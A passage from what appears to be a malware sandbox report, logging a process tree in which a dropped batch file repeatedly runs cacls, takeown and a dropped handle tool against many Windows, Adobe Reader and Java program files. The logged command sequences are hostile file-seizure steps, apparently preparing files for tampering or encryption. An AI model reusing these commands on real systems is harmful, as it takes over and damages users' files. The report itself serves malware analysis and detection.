      Executes dropped EXE
      PID:1636
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:2216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:4088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2732
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:3460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3048
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:3000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3952
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2632
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""
  2⤵
  - Loads dropped DLL
  PID:3176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PDIALOG.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PDIALOG.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1792
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""
  2⤵
  - Loads dropped DLL
  PID:2144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Shorthand.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2420
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Shorthand.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:2524
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:2608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2632
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3212
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3236
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3184
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:3208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  - Loads dropped DLL
  PID:900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3408
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2376
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  - Loads dropped DLL
  PID:1592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "bl.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3448
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "bl.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3404
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  - Loads dropped DLL
  PID:3424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3512
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3524
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  - Loads dropped DLL
  PID:3564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2792
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3588
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1196
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  - Loads dropped DLL
  PID:1168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    - Modifies file permissions
    PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "tl.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "tl.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:2440
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  - Loads dropped DLL
  PID:1076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Identity-V" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2644
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Identity-V" -nobanner
      4⤵
      Executes dropped EXE
      PID:1760
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  - Loads dropped DLL
  PID:2984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2948
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  - Loads dropped DLL
  PID:2940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2556
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1064
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  - Loads dropped DLL
  PID:2164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    - Modifies file permissions
    PID:2332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "brt55.ths" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "brt55.ths" -nobanner
      4⤵
      Executes dropped EXE
      PID:2748
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  - Loads dropped DLL
  PID:3640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:3732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    - Modifies file permissions
    PID:3748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3768
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      Executes dropped EXE
      PID:3776
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  - Loads dropped DLL
  PID:3860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:3828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3804
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:3900
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  - Loads dropped DLL
  PID:3960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:3920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1152
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2336
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2084
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2688
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2852
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3148
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2092
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  PID:1456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:3224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\cmd.exe
